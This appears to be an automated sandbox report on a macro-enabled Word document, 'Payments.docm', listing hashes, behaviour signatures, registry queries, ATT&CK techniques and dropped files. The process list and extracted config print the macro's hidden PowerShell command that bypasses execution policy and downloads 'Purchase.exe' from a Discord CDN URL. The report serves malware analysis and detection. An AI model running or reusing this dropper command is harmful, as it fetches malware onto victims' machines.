47edfbe9d61e39a1c4f2f1542e48f2ebac25be5a2939c98dc9bf86150f0abf1f

General

Target

Payments.docm
Size

83KB
MD5

27cb67322a39cf49a0560f784df67969
SHA1

0750c70072f37062a1079f14a1e4da0f78a5fdfe
SHA256

37c52ac76731fec0a321cae8cd5cf91597de3c90aed254f28fbcb4764e617e23
SHA512

4260a95093659d0beaf40c63a6bfbee4d63b5ec4a69760130cacef4c441c1ebe591111ed964b0ae3d6b508052bde145a8d6893dc1f2eea624bc7bbdecd5a3968

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://cdn.discordapp.com/attachments/709738084001906749/709738177027637330/Purchase.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4776	2316	powershell.exe	WINWORD.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

51 4776 powershell.exe
52 4776 powershell.exe

flow	pid	process
51	4776	powershell.exe
52	4776	powershell.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEWINWORD.EXEEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2316 WINWORD.EXE
2316 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4776 powershell.exe
4776 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4776 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

2316 WINWORD.EXE
2316 WINWORD.EXE

pid	process
4776	powershell.exe
4776	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4776	powershell.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

pid	process
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
4892	EXCEL.EXE
4892	EXCEL.EXE
4892	EXCEL.EXE
4892	EXCEL.EXE
5060	EXCEL.EXE
5060	EXCEL.EXE
5060	EXCEL.EXE
5060	EXCEL.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE
2316	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2316 wrote to memory of 4776	2316	WINWORD.EXE	powershell.exe
PID 2316 wrote to memory of 4776	2316	WINWORD.EXE	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payments.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cdn.discordapp.com/attachments/709738084001906749/709738177027637330/Purchase.exe',$env:Temp+'\Filename.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4892

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
Filesize
471B

MD5
136ba521784a8ce47a3850452207b885

SHA1
b654f686e5c96c5d4300bc81822c22c0928fe1cd

SHA256
8fb5921945889e17a35d67a61a81a767323f57fe0edd07a1fa6dadbd62669117

SHA512
619f1e14e419c77e511e27d55116b66a934ba550893a794d274a35c02d0d0e9a177eef2b7ec5f40a821a5c501bb000872822fd5a41d71d209a6dc23ed88e11bf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
Filesize
416B

MD5
65539a1e5524c9396f239f30288aa17d

SHA1
4255ebceeec2694d3cac55f81fb459a7b9a6d9d2

SHA256
83dd4fc25d1ec747c50a8a6d69b445f5591f581ec7c6d53aad8c9463705b7eec

SHA512
7dfdf24fb32646281ce3d21bfc43df5dc7b32249f83f8eda89066808b2e297836211eb3a35496d80eab0752e155ad89706f8b21c064043c7c080eb11ec82841c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1FD47DF7-23BC-4170-BBBC-3B4E81372E1B
Filesize
145KB

MD5
08d0acfcabfa9194fd8bb689b77cffb7

SHA1
26ddb220abc6f141335674dfa67f8efceba1336e

SHA256
16167c73fedbc0d6ea02014bde0ed64cee03afe2d8c7f64c8f784117f4bf8175

SHA512
46aff8e53305c929b96dd4f386d48ef51ea643ceb8644696f18d5ac03f796c9a9e8bed72e2cb7e761266a61cfe401c413e3392aebbd7fba01bc18d740a3eaa94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
Filesize
303KB

MD5
3775d965d0083409739f9e27918ec12a

SHA1
409fa9f4fe3d3810d5181e1ad9c0ee8bb556df48

SHA256
68f47c97290d8f5e8090c3552863ab12de0803f2da8c53cb0164cb18204f1031

SHA512
1f2623f9da2c3dfdd6b372671a8260bd52eb19a2ec9dfc561d551a5a33076d8e5df3818f7fcc58ebe196181471f034d314b8de3b6cba67b8acad4e2f81a5d015

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
Filesize
303KB

MD5
3775d965d0083409739f9e27918ec12a

SHA1
409fa9f4fe3d3810d5181e1ad9c0ee8bb556df48

SHA256
68f47c97290d8f5e8090c3552863ab12de0803f2da8c53cb0164cb18204f1031

SHA512
1f2623f9da2c3dfdd6b372671a8260bd52eb19a2ec9dfc561d551a5a33076d8e5df3818f7fcc58ebe196181471f034d314b8de3b6cba67b8acad4e2f81a5d015

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db
Filesize
4KB

MD5
f138a66469c10d5761c6cbb36f2163c3

SHA1
eea136206474280549586923b7a4a3c6d5db1e25

SHA256
c712d6c7a60f170a0c6c5ec768d962c58b1f59a2d417e98c7c528a037c427ab6

SHA512
9d25f943b6137dd2981ee75d57baf3a9e0ee27eea2df19591d580f02ec8520d837b8e419a8b1eb7197614a3c6d8793c56ebc848c38295ada23c31273daa302d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
Filesize
48KB

MD5
5bf5746e446ceb0485d08c04dd232a0b

SHA1
bb4d945dc1e5520f87ef30e2e1d95ae15c39432a

SHA256
d07214d18178f4c33693c779f03d936a4db74f5bca7c2c89298f7fdda4469eb6

SHA512
b5c9fe61fc207c825bb536e925e921fa914c4c8eeab8a4e8db7f4d041aac2ba91ec8aa74fefe655f359317ea3e7d4f8c77ffe515e12c86881271cecb6a9670dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
Filesize
48KB

MD5
5bf5746e446ceb0485d08c04dd232a0b

SHA1
bb4d945dc1e5520f87ef30e2e1d95ae15c39432a

SHA256
d07214d18178f4c33693c779f03d936a4db74f5bca7c2c89298f7fdda4469eb6

SHA512
b5c9fe61fc207c825bb536e925e921fa914c4c8eeab8a4e8db7f4d041aac2ba91ec8aa74fefe655f359317ea3e7d4f8c77ffe515e12c86881271cecb6a9670dc

Download Submit
memory/2316-135-0x00007FF89A150000-0x00007FF89A160000-memory.dmp

Filesize
64KB

Download
memory/2316-133-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/2316-131-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/2316-132-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/2316-136-0x00007FF89A150000-0x00007FF89A160000-memory.dmp

Filesize
64KB

Download
memory/2316-130-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/2316-134-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/4776-144-0x0000000000000000-mapping.dmp

Download
memory/4776-156-0x00007FF8B1490000-0x00007FF8B1F51000-memory.dmp

Filesize
10.8MB

Download
memory/4776-154-0x00000181680A0000-0x00000181680C2000-memory.dmp

Filesize
136KB

Download
memory/4892-164-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/4892-169-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/4892-170-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download
memory/5060-166-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads